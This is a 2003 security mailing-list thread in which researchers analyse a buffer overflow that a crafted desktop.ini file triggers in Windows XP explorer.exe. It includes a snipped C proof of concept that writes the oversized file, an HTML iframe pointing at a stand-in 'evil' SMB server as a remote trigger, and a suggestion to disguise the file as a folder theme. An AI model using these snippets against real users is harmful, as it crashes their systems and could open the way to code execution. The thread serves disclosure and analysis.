From: Kris Matthews (krismmailsnare.net)
Date: Sun May 11 2003 - 15:39:24 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I have been unable to reproduce it in this fashion; my quick-and-dirty
guess is that explorer.exe does not attempt to interpret that file for
remote (smb/etc) shares.

However, if you do it from a _local_ share.... It still blows up quite
nicely. :)

Regards,
Kristopher

On Sun, 2003-05-11 at 13:55, Berend-Jan Wever wrote:
> Could this not be done remotely without user interaction except browsing an
> evil website by using SMB ?
> <HTML><BODY>
> <IFRAME src="\\my-evil-server\">
> </BODY></HTML>
> You can make IE browse a harddisk which' contents you control...
>
> I don't have XP so I can't test this. Let me know what you find.
>
> Cheers,
>
> Berend-Jan Wever
>
> ----- Original Message -----
> From: "Kristopher Matthews" <krismmailsnare.net>
> To: "'Ryan Yagatich'" <ryanypantek.com>
> Cc: <vuln-devsecurityfocus.com>
> Sent: Friday, May 09, 2003 18:42
> Subject: RE: Buffer overflow in Explorer.exe
>
>
> I have tested and duplicated this behavior on a fully patched/updated
> Windows XP Pro system.
>
> 1. The overflow is for that particular key, AFAICT.
> 1a. It will not work for the root (c:/) directory; explorer.exe does not
> parse 'desktop.ini' for that directory. It will, however, work for any other
> directory.
> 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
> looks for all the world like a standard buffer overflow; I believe a more
> carefully crafted 'desktop.ini' file could be cause for explorer.exe to
> unintentionally execute arbitrary code.
> 3. Download and execute untrusted code? Combine this with any of the other
> popular expoloits for windows; also, it wouldn't be terribly hard to get a
> user to download a 'desktop.ini' file to their "My Documents" directory (in
> the guise, of, say, a folder them, which windows does support; e.g.
> different background, file layout, etc); bam, whenever they open that
> directory, explorer crashes.
>
> Regards,
> Kristopher
>
>
> -----Original Message-----
> From: Ryan Yagatich [mailto:ryanypantek.com]
> Sent: Thursday, May 08, 2003 6:28 PM
> To: at4r3wdesign.es
> Cc: vuln-devsecurityfocus.com
>
> Hi,
> I don't quite understand the purpose behind this code. It creates
> a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
> contents of
>
> [.ShellClassInfo]
> AAAAAAAAAAAA {x2301}
>
>
> And then terminates? I don't have a windows machine available to
> really explore this any, but what makes that entry in desktop.ini cause
> this? Furthermore, is this issue only for that particular key or is it
> generally just key/excessive parameter/missing value size that is
> affected? And additionally, you mention that explorer will no longer be
> able to operate when trying to browse the hard disk, but does this mean
> globally, or when they try to browse the c:/ drive, or just that
> particular folder?
> Please send me more information about this, (even if it references
> past posts that I have missed) so that I can better understand the
> severity of this. Espcially since to me, I still see it as someone needing
> to download and execute untrusted software which causes a system crash,
> and if that were going to happen there are far worse things that can be
> done besides creating a small text file.
>
> Thanks,
> Ryan Yagatich
>
>
> ,_____________________________________________________,
> \ Ryan Yagatich supportpantek.com \
> / Pantek Incorporated (877) LINUX-FIX /
> \ http://www.pantek.com/security (440) 519-1802 \
> / Are your networks secure? Are you certain? /
> \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\
>
> On Wed, 7 May 2003, aT4r InsaN3 wrote:
>
> >This bug allow a malicious an attacker to execute data with privileges of a
>
> >user that is browsing the hard disk with explorer.
> >
> >tested against winxp SP1
> >
> >example code provided.
> >
> <snip>
> >
> > strcpy(path,"\\aT4r[at]3WDesign.es Security");
> > mkdir(path);
> > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
> >
> > strcat(path,"\\desktop.ini");
>
> > bof=fopen(path,"w");
> > fputs("[.ShellClassInfo]\n",bof);
> > memset(evil,'A',BUFF);
> > fputs(evil,bof);
> > fclose(bof);
> <snip>
>
>
>
>
>
>
>

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]